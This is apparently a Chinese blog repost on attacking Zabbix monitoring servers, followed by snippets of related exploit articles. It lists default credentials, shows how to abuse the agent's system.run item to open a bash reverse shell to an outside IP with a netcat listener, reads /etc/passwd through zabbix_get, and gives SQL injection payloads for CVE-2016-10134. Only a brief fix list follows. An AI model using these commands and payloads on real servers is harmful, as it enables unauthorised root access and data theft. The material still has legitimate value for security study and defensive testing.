zabbix漏洞

最新推荐文章于 2024-07-09 19:39:05 发布
最新推荐文章于 2024-07-09 19:39:05 发布
阅读量688 收藏
点赞数
文章标签: 运维 php shell
原文链接:http://blog.51cto.com/865516915/2422767
版权

zabbix配置不当安全事件
1.sohu的zabbix,可导致内网***
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0127627
2.京东某站shell直入jae内网物理机内核版本过低
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086349

zabbix弱口令利用
zabbix默认的口令为Admin:zabbix,以及存在guest密码为空
Zabbix server可以远程在agent的机器上执行任意命令
建立监控项
system.run[command,<mode>]
这个模块是agent自带的,获取服务器shell,获取root权限。
监控项:
bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1
nc -lvp 6666
zabbix_get命令调用:
zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]'

zabbix注入利用
latest.php SQL注入漏洞(CVE-2016-10134)
Payload: latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)
jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

修复建议
不要放在外网
修复默认密码
禁用guest用户
不要以root启动
401认证
备份数据-升级版本

bozhubing0375
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
zabbix漏洞总结
ytuo1223的专栏
05-23 3756
0x01  zabbix的默认账户与密码 默认口令 admin/zabbix 或者是guest/空 ,(系统内置账户)可以多试试 0x02 zabbix注入 CVE-2013-5743(影响版本 1.8.5-1.8.9) 前提guest账户可以登录 exp利用: http://zabbix.server/zabbix/httpmon.php?applications=2 and (se
Zabbix公告多个安全漏洞,涉及多个版本(附修复方案)
乐维社区的博客
01-18 1723
日前,Zabbix官方公告发现了2个安全漏洞,涉及多个版本,漏洞代号如下:高危漏洞:CVE-2023-32725,一般漏洞:CVE-2023-32727,据了解,高危漏洞CVE-2023-32725的CVSS评分高达9.6分。CVE-2023-32725漏洞出现在仪表板中,当用户使用带有 URL 小部件的仪表板的Scheduled reports时,将会造成zbx_session cookie 泄漏。
漏洞盒子/Zabbix SQL注入漏洞分析_小白白帽子教程
2401_84915584的博客
06-23 167
zabbix sql注入漏洞爆出来已有好几天了,最近忙于安全盒子用户中心的设计,一直没有去研究这个注入,今天早起,闲暇时间写下该文。
Zabbix登录绕过漏洞复现(CVE-2022-23131)
渗透测试研究中心
03-03 3152
0x00 前言最近在复现zabbix漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意......
CVE-2017-2824 zabbix 命令注入漏洞(未授权访问/绕过登录)
qq_41567985的博客
09-27 618
Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Server端 trapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。命令执行后,执行docker-compose ps查看容器是否全部成功启动,如果没有,可以尝试重新执行docker-compose up -d。总结一下: 其中那个多试几次就好,还有,超时时间改小一点,不要极端,不然很难反弹shell。---->可见-权限算太高。
zabbix 漏洞收集总结
sojrs_sec的博客
12-31 2714
一: 弱口令/默认账号 admin:zabbix Admin:zabbix guest: 空 二: sql注入(ave-2016-10134) 版本 2.2.x 3.3.0-3.03 1 http://192.168.239.24/latest.php?output=ajax&sid=bb3e723dc1a917a2&favobj=toggle&toggle_open_s...
zabbix3.42
08-28
5. 安全性强化:提升了系统的安全防护措施,包括加强了认证和授权机制,以及对潜在漏洞的修复。 三、Zabbix 3.4.12安装与配置 1. 下载与安装:可以从Zabbix官方网站获取Zabbix 3.4.12的源码包或预编译二进制包,...
zabbix 2.4.7
02-26
1. **安全增强**:修复了一些已知的安全漏洞,增强了系统的安全性。 2. **错误修复**:对多个已知问题进行了修复,包括数据收集、报警触发、Web监控等方面,提高了系统的稳定性。 3. **性能提升**:进一步优化了性能...
zabbix-4.0.19.tar.gz
03-05
此版本修复了前一版本的若干漏洞,提高了性能,并引入了一些新特性。 2. **安装过程** - **系统要求**:确保你的服务器满足Zabbix的最低硬件和软件需求,通常需要Linux环境和兼容的数据库(如MySQL或PostgreSQL)...
Zabbix Sia Zabbix 逻辑漏洞(CVE-2022-23134)
最新发布
Flag少侠的博客
07-09 9045
打开靶场打开是一个登录页面社工搜索默认用户名密码成功登录!!!这里复现环境太困难了,所以直接给出了 flag网上还有通过 RCE 命令获得 flag 的,这里给出的是通过题目要求复现的逻辑漏洞大佬链接t=N7T8大佬链接https://mp.weixin.qq.com/s/UiNEDrJ-3fPArtMLgeHvAQ。
请求zabbix_【更新】Zabbix 远程代码执行漏洞(CVE202011800)
weixin_36251052的博客
01-16 380
漏洞名称 :Zabbix 远程代码执行漏洞CVE-2020-11800威胁等级 : 高危影响范围: Zabbix 2.2.18 -2.2.23Zabbix 3.0 -3.0.30 Zabbix3.2-3.2.11漏洞类型 :远程代码执行利用难度 : 高 漏洞分析 1组件介绍Zabbix是一个基于WEB界面的分布式系统监视以及网络监视的企业级...
zabbix漏洞利用 CVE-2016-10134
Jiajiajiang_的博客
11-14 3146
首先,百度百科抄一下定义 zabbix是一个基于web界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。 zabbix由2部分构成,zabbix server与可选组件zabbix agent。 zabbix server可以通过SNMP,zabbix a...
漏洞复现】Zabbix弱口令再到命令执行Getshell
cjstang的博客
06-29 2740
Zabbix使用默认口令成功进入平台,写入shell脚本反弹shell
Zabbix 新增两个漏洞 CISA 已知被利用漏洞列表中,新增两个 Zabbix 漏洞
weixin_45735613的博客
02-28 242
关键词 CISA、zabbix、安全漏洞 CISA 命令所有联邦民事行政部门机构 (FCEB) 在2022 年 3 月 8 日之前,解决这两个Zabbix 漏洞。 Security Affairs 资讯网站披露,美国网络安全基础设施和安全局(CISA) 在其已知被利用漏洞目录中,新增了两个 Zabbix 漏洞。据悉,漏洞会影响 Zabbix 基础设施监控工具。 漏洞详情如下表: 根据具有约束力的操作指令(BOD) 22-01要求:为了降低已知被利用漏洞的重大风...
【网络安全实战】某配送平台zabbix 未授权访问 + 弱口令
A1_3_9_7的博客
01-22 554
找到一个某src的子站,通过信息收集插件wappalyzer,发现ZABBIX-监控系统:使用谷歌搜索历史漏洞zabbix漏洞通过目录扫描扫描到后台,谷歌搜索一下有没有默认弱口令成功进去了,挖洞就是这么简单:搜索文章还爆过未授权访问漏洞,打一波又成功进去了,已经清除缓存在拼接路径的,进去成功寻找功能点,在搜索位置输入任何东西,前端页面就会显示什么,猜测可能存在反射xss,但没什么用,继续测试ssti注入不存在,这个站还可以getshell,但是点到为止。
zabbix漏洞利用 Zabbix Server远程代码执行漏洞CVE-2017-2824 2.4.X均受影响
weixin_33849215的博客
09-01 1338
近日,Zabbix Server 2.4.X的trapper命令功能中被曝出存在可利用的代码执行漏洞(CVE-2017-2824)。 一组特制的数据包可能导致命令注入,导致远程执行代码。 攻击者可以从活动的Zabbix Proxy发出请求以触发此漏洞。该漏洞位于Zabbix代码的“Trapper”部分,这是允许代理和服务器通信的网络服务(TCP端口100...
Zabbix监控系统安装指南
"DBA的Zabbix监控系统安装说明文档" 本文档主要介绍DBA如何安装和配置Zabbix监控系统,Zabbix是一款开源的企业级监控解决方案,可以用来监控...同时,及时更新软件版本,修复已知的安全漏洞,保持监控系统的有效性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值